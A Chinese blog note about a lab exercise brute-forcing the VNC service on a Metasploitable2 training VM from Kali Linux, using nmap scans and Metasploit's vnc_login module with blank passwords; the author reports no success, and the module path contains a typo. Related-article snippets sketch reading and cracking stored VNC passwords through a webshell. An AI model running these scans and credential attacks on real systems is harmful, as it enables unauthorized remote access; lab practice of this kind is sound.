kali linux对Metasploitable2漏洞利用,vnc爆力破解 笔记

最新推荐文章于 2024-05-13 08:00:00 发布
最新推荐文章于 2024-05-13 08:00:00 发布
阅读量2k 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30508729/article/details/101081568
版权

VNC (Virtual Network Console)是虚拟网络控制台的缩写。它 是一款优秀的远程控制工具软件,由著名的 AT&T 的欧洲研究实验室开发的。可视化控制,类似于远程桌面,默认vnc服务端运行在5900端口

实验环境:

攻击机:kali linux 
ip:192.168.172.134
目标机:Metasploittable2
ip:192.168.172.129

攻击过程:

step1:探测

nmap 192.168.172.129

nmap -sV -p 5900 192.168.172.129

step2:爆破

启动msf

命令:use auxiliary/scancer/vnc/vnc_login

show options

set rhosts 192.168.172.129

set blank_passwords true             //设置弱密码爆破

run

本人未爆破成功,VNC相当于windows中的3389远程控制 。

 

 

 

 

02be55f
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
kali Linux系统的漏洞利用
06-19
### Kali Linux系统的漏洞利用 #### 一、Metasploitable操作系统 Metasploitable是一款专为安全测试和渗透测试设计的操作系统,基于Ubuntu Linux。它预装了一系列易受攻击的服务和应用程序,使得安全专家可以方便...
web渗透测试----5、暴力破解漏洞--(3)FTP密码破解
七天
06-23 1683
FTP暴力破解
kali2021.2实现VNC
GGGu123的博客
02-28 8811
kali2021.2实现VNC【保姆级教程】
未授权访问:VNC未授权访问
最新发布
qq_68163788的博客
05-13 835
VNC(Virtual Network Computing)是一种流行的远程控制计算机系统的协议。它允许用户通过网络从一台计算机查看和操作另一台计算机的桌面环境,就像坐在那台计算机前一样。然而,如果VNC服务器没有正确配置安全措施,比如设置访问密码或仅允许特定IP地址连接,就可能导致未授权访问的风险。 未授权访问意味着恶意攻击者可能会无需密码或通过猜测弱密码等手段,非法获取对VNC服务器的控制权限。一旦攻击者获得了访问权限,他们可以监控敏感信息、安装恶意软件、篡改数据甚至完全接管受害者的计算机系统。
Kali常见攻击手段_kali攻击
weixin_51725318的博客
12-27 2659
Kali常见攻击手段
基于Ubuntu系统的VNC链接漏洞复现
liuguangshibei的博客
06-24 734
攻击机:kali 靶机:基于Ubuntu8的metasploitable2系统 靶机开放服务:无nmap扫描找到当前网段存活主机,并发现目标主机操作系统为Linux 2.6.X,IP地址为:192.168.2.71,可见靶机中开放了21、445、3306等大量端口。 ...
安全课堂kali linux笔记1~100课.zip
07-27
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni...目前Kali Linux的最新版本为2019.2,增加了对RTL8812AU网卡的支持
Kali Linux安装ipython2 和 ipython3的方法
12-31
2、安装 pip3 :apt-get install python3-pip 3、安装ipython 2 : pip install ipython. 查看 ipython 命令的所在位置:which /usr/local/bin/ipython 改名: mv /usr/local/bin/ipython /usr/local/bin/ipython2 ...
50-50.渗透测试-Kali Linux漏洞利用
05-10
50-50.渗透测试-Kali Linux漏洞利用
kali Linux渗透技术详解笔记
07-27
kali Linux环境部署,Linux相关命令,枚举工具,简单网络管理协议,邮件传输协议。
VNC-Server-6.7.1-Linux-x64.rpm
04-09
用与连接linux服务器的远程桌面,和本地使用是一样的,方便快捷,还有各种上丰富的小功能,画质超级的清析,和在本地使用一样的清晰。
VNC密码破解
06-20
破解VNC密码 我们知道即使作为网络管理员,我们也不会一直待在服务器旁边,因此在我们需要对服务器进行操作时候,很多时候都是远程连接进行管理的。当然远程控制管理可以使用Windows自带的远程桌面、Symantec pcAnywhere、vnc等,这里我就简单介绍下如何获得vnc的密码权限,来达到远程连接服务器的效果 1、因为VNC的密码是保存在注册表中的,需要能读出来,这一点比PCANYWHERE的利用难度大一点 VNC3.0版本的的密码存放在HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password 处 VNC4.0版本的密码存放在HKEY_CURRENT_USER\Software\RealVNC\WinVNC4\Password 处 2、假如我们已经获得了web服务器的webshell权限,同时对注册表有读取权限(这里如何获得web服务器的webshell权限,暂不介绍),我们使用命令webshell命令regedit -e c:\vnc.reg HKEY_CURRENT_USER\Software\RealVNC\WinVNC4\ 把注册表信息导出到c盘下的vnc.reg文件,然后右键编辑 3、如上图,我们看到了加密后保存在注册表里的vnc密码,现在我们使用破解软件vncx4.exe来破解该密码 备注:此处参数W是大写 然后顺序输入上面的每一个十六进制数据,每输完一个回车一次就行了。 4、测试 连接服务器,成功登录web服务器 说明:1、破解VNC的密码不难,但是如何获得一个web服务器的webshell权限,以及能够读取注册表是值得思考的 2、针对web服务器,禁止别人访问注册表;和在vnc服务端配置指定IP地址范围访问服务器都是很好的保护措施
Metasploitable2 靶机漏洞(上)
Fly_鹏程万里
05-02 7329
此次演示环境 1、靶机: Metasploitable2-Linux IP:192.168.160.131 2、攻击演示系统 Kali Linux 1.0.9 一、弱密码漏洞(Weak Password) 安全组织索引 CVE: OSVDB: BID: 原理: 系统或者数据库的登录用户,密码简单或者用户名与密码相同,容易通过暴...
主机发现与信息收集
qqqwww_sssd的博客
06-29 1305
*任务说明:仅能获取Server1的IP地址1.在Kali中使用Nmap工具查看本地路由与接口,并将该操作使用的全部命令作为Flag值提交;nmap -iflist2.通过Kali对靶机场景进行VNC服务扫描渗透测试,并将使用的脚本名称作为Flag值(如:MySQL-brute.nse)提交;find命令查找关键字“VNCvnc-brute.nse3.通过Kali对靶机场景进行VNC服务扫描渗透测试,并将该操作显示结果中VNC版本号作为Flag值提交;4.在Kali中使用Nmap发送空的UDP数据对类DN
Metasploitable2 漏洞评估(应该没人比我写得更详细更全了)
gh0stf1re的博客
09-17 5762
Metasploitable2 漏洞评估 深感自己基础不扎实,所以打算好好再练一下,就再日一遍Metasploitable2吧 前情提要 靶机(Metasploitable2)ip:192.168.206.216 攻击机(kali)ip:192.168.206.128 端口扫描 root@kali:~/Desktop/tools# nmap -sV -p 1-65535 192.168.206.216 扫描结果如下 PORT STATE SERVICE VERSION 21/tcp
kali-漏洞利用】(3.3)Metasploit后渗透(下):后渗透模块使用
08-06 700
kali-漏洞利用】后渗透模块利用
Linux_Kali网络渗透测试学习笔记总结(六)】漏洞利用
数据库爆破专家的博客
04-30 4026
网络渗透测试(六):漏洞利用 编写漏洞利用程序(exploit) 的程序代码都不仅费时费力,而且代码的质量直接关系找整个工作环节的成败。因此,渗透人员需要根据目标环境的实际情况对通过公开渠道获取的exploit程序进行相应调整。这种调整工作的技术含量很高,而且这类工作通常都是触类旁通的。掌握相应技能的人员可以举一反三地对很多程序进行调整。强烈建议读者在编写自己的漏洞利用程序之前,先通过公开渠道获取...
kali linux 2.0 实现vnc远程桌面连接
热门推荐
小白的奋斗史
04-27 4万+
该功能已在虚拟机上实现远程连接,写在这里仅供参考,也为了纪录我安装时遇到的各种苦逼问题。 安装vnc-server包 命令:apt-get install vnc-server 由上图可知:系统提示你选一个具体的安装包进行安装,并显示出了安装版本,我选择了安装vnc4server 命令:apt-get install vnc4server 由上图可知,服务器已经安装完毕。
VirtualBox详述:安装Kali Linux 2016.2教程
通过这个教程,读者可以了解到如何利用VirtualBox顺利地安装Kali Linux 2016.2,不仅适用于安全测试,还为开发者提供了一个便捷的开发和学习平台。在实际操作中,确保计算机硬件和网络配置满足要求,安装过程可能会...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值